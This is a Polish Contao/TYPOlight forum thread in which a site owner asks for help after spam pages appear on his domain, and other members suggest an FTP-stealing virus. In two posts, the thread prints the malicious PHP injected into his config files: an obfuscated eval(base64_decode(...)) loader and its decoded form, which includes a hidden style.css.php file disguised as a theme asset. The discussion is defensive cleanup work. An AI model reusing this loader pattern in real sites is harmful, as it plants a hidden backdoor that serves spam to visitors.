Skocz do zawarto艣ci

Witamy na polskim forum Contao
Zarejestruj si臋 teraz, aby skorzysta膰 ze wszystkich funkcji forum. Kiedy si臋聽zalogujesz, b臋dziesz m贸g艂 tworzy膰 tematy, pisa膰 posty, rozdawa膰 punkty reputacji, korzysta膰 z prywatnych wiadomo艣ci i zarz膮dza膰 swoim profilem. Je艣li posiadasz ju偶聽konto, zaloguj si臋 - w przeciwnym wypadku zarejestruj si臋 ju偶 teraz!
Zdj臋cie

w艂am na strone/serwer


  • Prosz臋 si臋 zalogowa膰 aby odpowiedzie膰
8 odpowiedzi na ten temat

#1
scorpimen

scorpimen

    Bywalec

  • Zarejestrowani
  • PipPip
  • 31 post贸w
  • Strona www:zobacz
  • LokalizacjaStarogard Gda駍ki
witam

ostatnio przegl膮da艂em sobie jakie linki znajduje google i bing na moja stron臋 i dozna艂em szoku
na has艂o scorpimen pokazuje mn贸stwo spamu

i teraz takie cos
http://not4u.scorpim... ... ke you cry
http://not4u.scorpimen.eu/

strona stoi na typolight
co prawda d艂ugo sta艂a na wersji 2.6 ale zrobi艂em jej aktualizacje ostatnio do najnowszej i dalej mam te 艣mieci

Jak to wywali膰 :P
  • 0

#2
Kamil

Kamil

    Contao ambassador

  • Administratorzy
  • 1538 post贸w
  • Strona www:zobacz
  • LokalizacjaLidzbark Warminski
Albo kto艣 dosta艂 si臋 do twojego FTPa, albo powiniene艣 jak najszybciej wgra膰 艂atk臋 http://www.typolight... ... -tool.html

Nie wiem jak to usun膮膰, najpierw sprawd藕 czy s膮 jakie艣 podejrzane pliki na serwerze. Wklej tu zawarto艣膰 pliku .htaccess
  • 0

Codefog - Contao web development


#3
qrczak

qrczak

    Ekspert

  • Zarejestrowani
  • PipPipPipPipPip
  • 415 post贸w
  • Lokalizacja呕u艂awy
By艂 te偶 taki wirus, kt贸ry wysysa艂 dane do kont ftp, 艂膮czy艂 si臋 z nimi i jaki艣 syf tam wgrywa艂. By艂o kilka zg艂osze艅 tego typu na oficjalnym forum i za ka偶dym razem to by艂 wirus. Nie wiem jak to jest w twoim przypadku ale mo偶e warto sprawdzi膰 co masz na ftp i/lub czy co艣 nie jest doklejone do pliku index.php
  • 0

#4
Kamil

Kamil

    Contao ambassador

  • Administratorzy
  • 1538 post贸w
  • Strona www:zobacz
  • LokalizacjaLidzbark Warminski

Nie wiem jak to jest w twoim przypadku ale mo偶e warto sprawdzi膰 co masz na ftp i/lub czy co艣 nie jest doklejone do pliku index.php

To by si臋 zgadza艂o - zmienna $_GET['bdoc'], a index.php nie wida膰, bo w艂膮czony jest mod_rewrite.
  • 0

Codefog - Contao web development


#5
scorpimen

scorpimen

    Bywalec

  • Zarejestrowani
  • PipPip
  • 31 post贸w
  • Strona www:zobacz
  • LokalizacjaStarogard Gda駍ki
wrzuci艂em 艣wie偶y index.php i htaccess, 艣ci膮gn膮艂em pliki z serwera i przeskanowa艂em nodem i zero zmiany :(

chyba czeka mnie czyszczenie ca艂ego serwerka i postawienie paru stron od nowa :(
---
chyba znalaz艂em winowajce
ciekawe jest to ze siedzia艂 w plikach system/config/
na pocz膮tku plik贸w dokleja艂 tylko sk膮d ten syf ??
<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL3JjNS9kb21haW5zL3Njb3JwaW1lbi5ldS9wdWJsaWNfaHRtbC9ub3Q0dS9wbHVnaW5zL3RpbnlNQ0UvdGhlbWVzL3NpbXBsZS9za2lucy9vMms3L2ltZy9zdHlsZS5jc3MucGhwJztpZihmaWxlX2V4aXN0cygkR0xPQkFMU1snbWZzbiddKSl7aW5jbHVkZV9vbmNlKCRHTE9CQUxTWydtZnNuJ10pO2lmKGZ1bmN0aW9uX2V4aXN0cygnZ21sJykmJmZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7b2Jfc3RhcnQoJ2Rnb2JoJyk7fX19')); ?>
<?php if (!defined('TL_ROOT')) die('You can not access this file directly!');
---
jednak to nie to cho膰 i tak dziwna sprawa sk膮d to si臋 tam wzie艂o
  • 0

#6
spin80

spin80

    Ekspert

  • Zarejestrowani
  • PipPipPipPipPip
  • 296 post贸w
Nie wiem czy czasem ten wirus nie zajmuje si臋 r贸wnie偶 plikami default.php i main.php
  • 0

#7
Kamil

Kamil

    Contao ambassador

  • Administratorzy
  • 1538 post贸w
  • Strona www:zobacz
  • LokalizacjaLidzbark Warminski

jednak to nie to cho膰 i tak dziwna sprawa sk膮d to si臋 tam wzie艂o


Sprawdza艂e艣 plik /plugins/tinyMCE/themes/simple/skins/o2k7/img/style.css.php?
<span class="syntaxhtml"><span class="syntaxdefault"><?phpif聽</span><span class="syntaxkeyword">(</span><span class="syntaxdefault">function_exists</span><span class="syntaxkeyword">(</span><span class="syntaxstring">'ob_start'</span><span class="syntaxkeyword">)</span><span class="syntaxdefault">聽</span><span class="syntaxkeyword">&&</span><span class="syntaxdefault">聽</span><span class="syntaxkeyword">!isset(</span><span class="syntaxdefault">$GLOBALS</span><span class="syntaxkeyword">[</span><span class="syntaxstring">'mfsn'</span><span class="syntaxkeyword">])){</span><span class="syntaxdefault">聽聽聽聽$GLOBALS</span><span class="syntaxkeyword">[</span><span class="syntaxstring">'mfsn'</span><span class="syntaxkeyword">]=</span><span class="syntaxstring">'/home/rc5/domains/scorpimen.eu/public_html/not4u/plugins/tinyMCE/themes/simple/skins/o2k7/img/style.css.php'</span><span class="syntaxkeyword">;</span><span class="syntaxdefault">聽聽聽聽if聽</span><span class="syntaxkeyword">(</span><span class="syntaxdefault">file_exists</span><span class="syntaxkeyword">(</span><span class="syntaxdefault">$GLOBALS</span><span class="syntaxkeyword">[</span><span class="syntaxstring">'mfsn'</span><span class="syntaxkeyword">]))</span><span class="syntaxdefault">聽聽聽聽</span><span class="syntaxkeyword">{</span><span class="syntaxdefault">聽聽聽聽聽聽聽聽include_once</span><span class="syntaxkeyword">(</span><span class="syntaxdefault">$GLOBALS</span><span class="syntaxkeyword">[</span><span class="syntaxstring">'mfsn'</span><span class="syntaxkeyword">]);</span><span class="syntaxdefault">聽聽聽聽聽聽聽聽if聽</span><span class="syntaxkeyword">(</span><span class="syntaxdefault">function_exists</span><span class="syntaxkeyword">(</span><span class="syntaxstring">'gml'</span><span class="syntaxkeyword">)</span><span class="syntaxdefault">聽</span><span class="syntaxkeyword">&&</span><span class="syntaxdefault">聽function_exists</span><span class="syntaxkeyword">(</span><span class="syntaxstring">'dgobh'</span><span class="syntaxkeyword">))</span><span class="syntaxdefault">聽聽聽聽聽聽聽聽</span><span class="syntaxkeyword">{</span><span class="syntaxdefault">聽聽聽聽聽聽聽聽聽聽聽聽ob_start</span><span class="syntaxkeyword">(</span><span class="syntaxstring">'dgobh'</span><span class="syntaxkeyword">);</span><span class="syntaxdefault">聽聽聽聽聽聽聽聽</span><span class="syntaxkeyword">}</span><span class="syntaxdefault">聽聽聽聽</span><span class="syntaxkeyword">}}</span><span class="syntaxdefault">?></span></span>
Id臋 o dych臋, 偶e tam siedzi druga cz臋艣膰 z艂o艣liwego kodu.
  • 0

Codefog - Contao web development


#8
scorpimen

scorpimen

    Bywalec

  • Zarejestrowani
  • PipPip
  • 31 post贸w
  • Strona www:zobacz
  • LokalizacjaStarogard Gda駍ki
w tym css.php tez by艂o.

Co znajd臋 jaki艣 kod i skasuje to to g.. dokleja mi go znowu. jak si臋 tego pozby膰 kompleksowo i co to jest je艣li mo偶na wiedzie膰. Bo czuje, 偶e wiecie co艣 o tym 艣wi艅stwie, wi臋cej ni偶 ja.
  • 0

#9
Kamil

Kamil

    Contao ambassador

  • Administratorzy
  • 1538 post贸w
  • Strona www:zobacz
  • LokalizacjaLidzbark Warminski
Albo to 艣wi艅stwo siedzi u ciebie na kompie, albo na serwerze. Gdzie masz hosting?

Po pierwsze, z innego komputera zmie艅 has艂o do serwera FTP. Nast臋pnie usu艅 znowu te linijki. Je艣li sytuacja si臋 powt贸rzy, to b臋dzie wiadomo, 偶e te 艣wi艅stwo zago艣ci艂o na serwerze. W przeciwnym wypadku zago艣ci艂o na twoim komputerze.
  • 0

Codefog - Contao web development





1 u偶ytkownik贸w czyta ten temat

0 u偶ytkownik贸w, 1 go艣ci, 0 anonimowych u偶ytkownik贸w